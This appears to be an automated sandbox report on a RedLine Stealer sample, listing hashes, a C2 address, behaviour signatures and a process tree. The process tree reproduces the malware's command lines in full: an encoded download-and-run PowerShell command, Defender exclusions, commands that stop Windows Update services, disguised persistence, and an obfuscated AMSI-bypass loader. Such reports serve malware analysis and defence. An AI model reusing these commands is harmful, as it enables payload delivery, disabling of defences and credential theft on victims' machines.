Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    43s
  • max time network
    89s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/01/2023, 00:41 UTC

General

  • Target

    b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe

  • Size

    119KB

  • MD5

    d9a2313ebd1f9d41687e127028bc230e

  • SHA1

    b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1

  • SHA256

    a5d8eac92699a2e8870775b0eb150bb3fdedf4e86f6b0a26a122ad5f7e9fd3c2

  • SHA512

    4ee00a77199e82d63967f9731a5dd101f2dcec52584337dff306c2d5b71dfa4d83ac473617da0b022d301f8878b5cd835b18a35603fbe9dd7682064dc30264be

  • SSDEEP

    3072:EcJw0ADKnZ1bEGSzLu1XlEWb3MeUn3PAngc13Aa99sXcc:/W3IZ1bgQlExeUcN99sXcc

Malware Config

Extracted

Family

redline

Botnet

1

C2

107.182.129.73:21733

Attributes
  • auth_value

    3a5bb0917495b4312d052a0b8977d2bb

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Stops running service(s) 3 TTPs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:592
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{7c4b187d-5741-46b1-a6a6-fca0b7b13e7c}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1528
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
        PID:388
        • C:\Users\Admin\AppData\Local\Temp\b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe
          "C:\Users\Admin\AppData\Local\Temp\b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2420
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:384
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
              4⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3808
              • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                5⤵
                • Executes dropped EXE
                PID:1916
              • C:\Users\Admin\AppData\Local\Temp\new2.exe
                "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:5040
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1764
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 492
                  6⤵
                  • Program crash
                  PID:4440
              • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:944
              • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                5⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Drops file in Program Files directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:4496
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 252
            3⤵
            • Program crash
            PID:2928
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 272
            3⤵
            • Program crash
            PID:3752
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 280
            3⤵
            • Program crash
            PID:2132
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1468
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2224
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:3536
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:4068
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:3124
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:2248
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:5000
          • C:\Windows\System32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
            3⤵
              PID:4364
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
              3⤵
                PID:4956
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                3⤵
                • Modifies security service
                PID:1544
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                3⤵
                  PID:2748
                • C:\Windows\System32\reg.exe
                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                  3⤵
                    PID:1860
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1928
                • C:\Windows\System32\dialer.exe
                  C:\Windows\System32\dialer.exe
                  2⤵
                    PID:208
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2420 -ip 2420
                  1⤵
                    PID:5000
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2420 -ip 2420
                    1⤵
                      PID:2748
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2420 -ip 2420
                      1⤵
                        PID:4376
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5040 -ip 5040
                        1⤵
                          PID:4024
                        • C:\Windows\system32\WerFaultSecure.exe
                          "C:\Windows\system32\WerFaultSecure.exe" -protectedcrash -p 1924 -i 1924 -h 184 -j 468 -s 532 -d 3460
                          1⤵
                            PID:644
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:axgxfHqYJyQF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DLTMsDOPitMxWW,[Parameter(Position=1)][Type]$xuzqGJmNKf)$rDXDdMQOfIs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+'l'+'e'+''+[Char](103)+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+'d'+'u'+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+'l'+'e'+'g'+'a'+[Char](116)+''+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+'C'+'la'+'s'+''+[Char](115)+','+[Char](80)+'u'+[Char](98)+''+'l'+'i'+[Char](99)+','+[Char](83)+''+'e'+'a'+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+[Char](111)+'C'+'l'+'as'+'s'+'',[MulticastDelegate]);$rDXDdMQOfIs.DefineConstructor('R'+[Char](84)+''+'S'+'p'+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+'m'+'e'+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'lic',[Reflection.CallingConventions]::Standard,$DLTMsDOPitMxWW).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'a'+'n'+'a'+[Char](103)+''+[Char](101)+'d');$rDXDdMQOfIs.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Pub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+'ewS'+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$xuzqGJmNKf,$DLTMsDOPitMxWW).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $rDXDdMQOfIs.CreateType();}$phIbDoxjBNQZq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+[Char](101)+''+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+'s'+'of'+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+'n32'+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+'e'+'p'+''+[Char](104)+'I'+[Char](98)+''+[Char](68)+''+[Char](111)+''+[Char](120)+''+'j'+''+[Char](66)+''+'N'+'Q'+[Char](90)+''+'q'+'');$jQndZzwPhUtocb=$phIbDoxjBNQZq.GetMethod(''+[Char](106)+''+'Q'+''+[Char](110)+''+'d'+'Zz'+[Char](119)+''+'P'+'h'+[Char](85)+'t'+[Char](111)+'c'+'b'+'',[Reflection.BindingFlags]''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'t'+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qxqRBaiukhwFIdBeiPy=axgxfHqYJyQF @([String])([IntPtr]);$PEWHlqaszbMFffKdzTFFrI=axgxfHqYJyQF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XyOlpaIFmnr=$phIbDoxjBNQZq.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+'l'+'32'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$ndvWkiSmlgpgij=$jQndZzwPhUtocb.Invoke($Null,@([Object]$XyOlpaIFmnr,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+'L'+''+'i'+''+'b'+'r'+[Char](97)+''+'r'+''+'y'+''+'A'+'')));$wzZnJpMpLIgNJPVwJ=$jQndZzwPhUtocb.Invoke($Null,@([Object]$XyOlpaIFmnr,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'tual'+'P'+''+'r'+''+'o'+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$nfUhlmW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ndvWkiSmlgpgij,$qxqRBaiukhwFIdBeiPy).Invoke(''+'a'+'ms'+'i'+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$zraiQkBxHNOwXnkBt=$jQndZzwPhUtocb.Invoke($Null,@([Object]$nfUhlmW,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+'S'+''+[Char](99)+''+[Char](97)+''+'n'+'Bu'+[Char](102)+'f'+'e'+'r')));$wGgibvyfAX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wzZnJpMpLIgNJPVwJ,$PEWHlqaszbMFffKdzTFFrI).Invoke($zraiQkBxHNOwXnkBt,[uint32]8,4,[ref]$wGgibvyfAX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$zraiQkBxHNOwXnkBt,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wzZnJpMpLIgNJPVwJ,$PEWHlqaszbMFffKdzTFFrI).Invoke($zraiQkBxHNOwXnkBt,[uint32]8,0x20,[ref]$wGgibvyfAX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+'al'+[Char](101)+'rs'+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                            1⤵
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            PID:100
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnHffVrxiLMf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$dVafhBXpTviUqJ,[Parameter(Position=1)][Type]$JxHlrKAILb)$aAfyWvEjOsJ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+[Char](116)+'e'+'d'+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+'a'+''+'t'+''+'e'+'Ty'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+'u'+'b'+''+[Char](108)+'i'+'c'+',S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+'A'+[Char](117)+'t'+[Char](111)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$aAfyWvEjOsJ.DefineConstructor(''+[Char](82)+'TS'+'p'+''+'e'+''+[Char](99)+'i'+[Char](97)+''+'l'+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+'Hi'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$dVafhBXpTviUqJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+'Man'+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$aAfyWvEjOsJ.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'ke',''+'P'+''+'u'+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+',N'+[Char](101)+''+'w'+'S'+'l'+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$JxHlrKAILb,$dVafhBXpTviUqJ).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $aAfyWvEjOsJ.CreateType();}$kxzabZLQRAhjw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+'.d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+'kx'+'z'+''+[Char](97)+''+[Char](98)+''+[Char](90)+''+'L'+''+'Q'+''+'R'+''+[Char](65)+''+[Char](104)+''+[Char](106)+''+'w'+'');$pRKHJThwAlMUgS=$kxzabZLQRAhjw.GetMethod('pRK'+[Char](72)+''+'J'+'Th'+[Char](119)+''+'A'+''+[Char](108)+'MU'+[Char](103)+''+[Char](83)+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ORVRCFDROUQTIrwTSaL=TnHffVrxiLMf @([String])([IntPtr]);$AczaECbfKdkEWHWUFmwcMO=TnHffVrxiLMf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$tdPFHKHJWGE=$kxzabZLQRAhjw.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'Mo'+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+[Char](72)+'a'+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+'d'+[Char](108)+''+'l'+'')));$HtPMOAaNZyPWSF=$pRKHJThwAlMUgS.Invoke($Null,@([Object]$tdPFHKHJWGE,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+[Char](76)+'ib'+'r'+''+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$ndqHzyqstXnVqbnSC=$pRKHJThwAlMUgS.Invoke($Null,@([Object]$tdPFHKHJWGE,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$mwAlDbS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HtPMOAaNZyPWSF,$ORVRCFDROUQTIrwTSaL).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+'dl'+[Char](108)+'');$Dprkdrtz